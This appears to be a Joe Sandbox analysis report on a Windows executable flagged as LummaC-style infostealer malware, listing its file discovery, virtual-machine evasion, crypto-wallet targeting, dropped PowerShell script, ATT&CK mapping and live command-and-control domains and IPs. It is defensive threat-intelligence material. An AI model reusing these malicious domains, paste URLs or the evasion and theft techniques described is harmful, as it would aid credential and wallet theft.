              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2276511844.0000000000737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match; File source: Process Memory Space: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe PID: 7412, type: MEMORYSTR
              Source: Yara match; File source: sslproxydump.pcap, type: PCAP
              MITRE ATT&CK Matrix (one line per tactic column; a number in brackets is the badge shown in that matrix cell, reproduced as it appears)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
              Execution: Windows Management Instrumentation [12]; Command and Scripting Interpreter [2]; At; Cron; Launchd; Scheduled Task; Systemd Timers
              Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
              Privilege Escalation: Process Injection [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
              Defense Evasion: Virtualization/Sandbox Evasion [221]; Process Injection [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; Software Packing; Steganography; Compile After Delivery
              Credential Access: OS Credential Dumping [2]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
              Discovery: Query Registry [1]; Security Software Discovery [221]; Process Discovery [1]; Virtualization/Sandbox Evasion [221]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [22]
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
              Collection: Archive Collected Data [1]; Data from Local System [41]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
              Command and Control: Web Service [1]; Encrypted Channel [11]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [4]; Application Layer Protocol [115]; Multiband Communication; Commonly Used Port
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
              Behavior Graph ID: 1601484; Sample: #Ud835#Udc7a#Ud835#Udc6c#Ud...; Startdate: 28/01/2025; Architecture: WINDOWS; Score: 100
              • Start node DNS/IP info: rentry.co; traveladdicts.top
              • Start node signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
              • rentry.co: Connects to a pastebin service (likely for C&C)
              • Process started from start node: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe (badge: 1)
              • DNS/IP info for that process: traveladdicts.top 104.21.60.241, 443, 49734, 49736 CLOUDFLARENETUS United States; rentry.co 104.26.3.16, 443, 49865 CLOUDFLARENETUS United States
              • File dropped by that process: C:\Users\user\...\MVYET7Q4Z4FMOQW2PUNL.ps1, HTML
              • Signatures for that process: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); 3 other signatures
              • Child process started by that process: powershell.exe (badge: 7)
              • Child process started by powershell.exe: conhost.exe

              Source | Detection | Scanner | Label | Link
              #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | 3% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              moonehobno.bond | 100% | Avira URL Cloud | malware |
              traveladdicts.top | 0% | Avira URL Cloud | safe |
              https://traveladdicts.top/L | 0% | Avira URL Cloud | safe |
              learnyprocce.bond | 100% | Avira URL Cloud | malware |
              https://traveladdicts.top/K | 0% | Avira URL Cloud | safe |
              rainy-lamep.bond | 100% | Avira URL Cloud | malware |
              https://traveladdicts.top/sd | 0% | Avira URL Cloud | safe |
              https://traveladdicts.top/apiC | 0% | Avira URL Cloud | safe |
              https://traveladdicts.top/c | 0% | Avira URL Cloud | safe |
              noxiuos-utopi.bond | 100% | Avira URL Cloud | malware |
              https://traveladdicts.top/api: | 0% | Avira URL Cloud | safe |
              https://traveladdicts.top/api9 | 0% | Avira URL Cloud | safe |
              abaft-taboo.bond | 100% | Avira URL Cloud | malware |
              https://traveladdicts.top/ | 0% | Avira URL Cloud | safe |
              https://traveladdicts.top/api | 0% | Avira URL Cloud | safe |
              http://www.testlab2008.com/indices/submit.php?c=CD&i= | 0% | Avira URL Cloud | safe |
              cowertbabei.bond | 100% | Avira URL Cloud | malware |
              conquemappe.bond | 100% | Avira URL Cloud | malware |
              https://traveladdicts.top/# | 0% | Avira URL Cloud | safe |
              elfinyamen.bond | 100% | Avira URL Cloud | malware |
              https://traveladdicts.top/3 | 0% | Avira URL Cloud | safe |
              https://traveladdicts.top/4 | 0% | Avira URL Cloud | safe |


              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              traveladdicts.top | 104.21.60.241 | true | true | | unknown
              rentry.co | 104.26.3.16 | true | false | | high
              Name | Malicious | Antivirus Detection | Reputation
              moonehobno.bond | true | Avira URL Cloud: malware | unknown
              traveladdicts.top | true | Avira URL Cloud: safe | unknown
              rainy-lamep.bond | true | Avira URL Cloud: malware | unknown
              learnyprocce.bond | true | Avira URL Cloud: malware | unknown
              noxiuos-utopi.bond | true | Avira URL Cloud: malware | unknown
              https://rentry.co/feouewe5/raw | false | | high
              https://traveladdicts.top/api | true | Avira URL Cloud: safe | unknown
              abaft-taboo.bond | true | Avira URL Cloud: malware | unknown
              elfinyamen.bond | true | Avira URL Cloud: malware | unknown
              conquemappe.bond | true | Avira URL Cloud: malware | unknown
              cowertbabei.bond | true | Avira URL Cloud: malware | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://aka.ms/pscore6lBkqpowershell.exe, 00000004.00000002.2480645091.00000000047E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://ocsp.rootca1.amazontrust.com0:#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017467015.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889627920.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017698604.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003797000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017873919.0000000003797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://rentry.co/static/icons/270.png#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470709109.0000000000745000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drfalse
                                                                                          high
                                                                                          https://www.ecosia.org/newtab/#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://rentry.co/static/icons/270.pnghZ#lxpowershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2146594813.0000000003A67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crl.microsoft.#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://ac.ecosia.org/autocomplete?q=#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.micro#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                                                                                                        high
                                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2147066813.0000000003756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://rentry.co/#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2469696699.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470709109.0000000000745000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2478360512.0000000003761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, MVYET7Q4Z4FMOQW2PUNL.ps1.0.drfalse
                                                                                                            high
                                                                                                            http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                                                                                                              high
                                                                                                              http://www.testlab2008.com/indices/submit.php?c=CD&i=#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exefalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://support.microsof#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889627920.00000000037E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://traveladdicts.top/##Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2304592052.0000000000754000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2144754640.0000000003780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://rentry.co/static/icons/270.pnghZ#lL1powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1889972418.0000000003772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885656687.000000000378A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885170790.000000000378B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885437575.0000000003789000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://traveladdicts.top/3#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000002.2475854244.0000000000753000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2470481305.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://traveladdicts.top/4#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1873015266.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://rentry.co/hZ#lpowershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2480645091.0000000004B19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://rentry.co/static/icons/512.pnghZ#lXNpowershell.exe, 00000004.00000002.2480645091.0000000004B49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.3.16 | rentry.co | United States | 13335 | CLOUDFLARENETUS | false
104.21.60.241 | traveladdicts.top | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1601484
Start date and time: 2025-01-28 16:14:47 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe (renamed because the original name is a hash value)
Original Sample Name: .exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/4@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 11
• Number of non-executed functions: 14
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.253.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, PID 7412 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 8004 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:15:57 | API Interceptor | 9x Sleep call for process: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
104.26.3.16 | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | malicious | LummaC Stealer
 | random.exe | malicious | LummaC
 | #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe | malicious | LummaC
 | random.exe | malicious | LummaC
 | same.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm
 | !Setup.exe | malicious | LummaC Stealer
 | Full-Setup.exe | malicious | LummaC
 | file.ps1 | malicious | LummaC Stealer
 | grA6aqodO5.exe | malicious | Python Stealer, CStealer
 | SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe | malicious | XWorm
104.21.60.241 | Ken.skonicki Replay VM (01m32sec).docx | malicious | HTMLPhisher
 | https://taf7.rphortan.com/xV5YqZuT/#Xjeffrey.laws@99restaurants.com | malicious | HTMLPhisher, Tycoon2FA
 | phish_alert_sp2_2.0.0.0(4).eml | malicious | HTMLPhisher
 | Ewhite Replay VM .docx | malicious | HTMLPhisher, Tycoon2FA
 | https://deutsche-post-infos.com/ | malicious | Unknown
 | http://www.bccontractingco.com | malicious | Unknown
 | http://mail.finance-asp4.com | malicious | Unknown
 | http://weatherchalk.org | malicious | Unknown
 | https://analytics.webnorth.cloud/?module=Login&action=acceptInvitation&token=4e85c7ac842c08a74fec44d4668b7a9a | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
traveladdicts.top | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | malicious | LummaC Stealer | 172.67.202.141
rentry.co | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | malicious | LummaC Stealer | 104.26.3.16
 | random.exe | malicious | LummaC | 104.26.3.16
 | random.exe | malicious | Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Stealc, Vidar | 104.26.2.16
 | atlantis4en.exe | malicious | LummaC Stealer | 104.26.2.16
 | #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe | malicious | LummaC Stealer | 104.26.2.16
 | #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe | malicious | LummaC | 104.26.3.16
 | random.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer | 104.26.3.16
 | random.exe | malicious | LummaC | 104.26.3.16
                                                                                                                                                                  random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  • 172.67.75.40
                                                                                                                                                                  XWorm RAT V2.1.exeGet hashmaliciousNjrat, XWormBrowse
                                                                                                                                                                  • 172.67.75.40
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.202.141
| https://pub-6001c4a55cf84413a41e24da9a9d5948.r2.dev/OnDrive-%20complete%20with%20Docx.html | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
| Set-UPl.exe | Get hash | malicious | LummaC Stealer | Browse | 188.114.96.3
| https://share.hsforms.com/1_2WOdMKeTWCrk3shrRFEBQt7nc8 | Get hash | malicious | HTMLPhisher | Browse | 104.16.117.116
| Thegarden Benefit Memo.pdf | Get hash | malicious | Unknown | Browse | 104.21.2.8
| PDFQOUTE COMFIRMATION pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 104.21.16.1
| MACHINE QUOTATION.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
| file_1737764438853.pdf | Get hash | malicious | Unknown | Browse | 188.114.96.3
| WebCompanionInstaller-12.901.5.1061-prod.exe | Get hash | malicious | Unknown | Browse | 104.16.149.130
| WebCompanionInstaller-12.901.5.1061-prod.exe | Get hash | malicious | Unknown | Browse | 104.16.148.130
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe | Get hash | malicious | LummaC Stealer | Browse | 104.26.3.16, 104.21.60.241
| Set-UPl.exe | Get hash | malicious | LummaC Stealer | Browse | 104.26.3.16, 104.21.60.241
| vxaZNB3wGd.exe | Get hash | malicious | Unknown | Browse | 104.26.3.16, 104.21.60.241
| k6JaohgQKp.msi | Get hash | malicious | Unknown | Browse | 104.26.3.16, 104.21.60.241
| a33kcGf1aA.exe | Get hash | malicious | Unknown | Browse | 104.26.3.16, 104.21.60.241
| vxaZNB3wGd.exe | Get hash | malicious | Unknown | Browse | 104.26.3.16, 104.21.60.241
| a33kcGf1aA.exe | Get hash | malicious | Unknown | Browse | 104.26.3.16, 104.21.60.241
| cHAxMzM3_crypted_LAB.exe | Get hash | malicious | LummaC | Browse | 104.26.3.16, 104.21.60.241
| REQUIRED-ORDER-REF.cmd.exe | Get hash | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | Browse | 104.26.3.16, 104.21.60.241
| Racoona.hta | Get hash | malicious | LummaC Stealer | Browse | 104.26.3.16, 104.21.60.241

No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.7307872139132228
Encrypted: false
SSDEEP: 3:Nlllul4/X:NllU4/
MD5: 3C34689C4BD27F7A51A67BBD54FA65C2
SHA1: E444E6B6E24D2FE2ACE5A5A7D96A6142C2368735
SHA-256: 4B7DAB4629E6B8CC1CD6E404CB5FC110296C3D0F4E3FDBBDB0C1CE48B5B8A546
SHA-512: 02827A36A507539C617DFE05EDF5367EB295EB80172794D83F3E9AF612125B7CA88218C2601DFA8E0E98888061A0C7B0E78428188523FA915F39B23F148F8766
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e.................................,.........................

Process: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
File Type: HTML document, ASCII text, with very long lines (945)
Category: dropped
Size (bytes): 4452
Entropy (8bit): 5.071274990406666
Encrypted: false
SSDEEP: 48:5q41lJM8WOxEj4/wPsAG4oevjKEcXrCnBBkpBxVGLrGWQ7aSTw2wptI8Id6Pu:5hPA5jKEcXrCnTkpBxFzanx/ICu
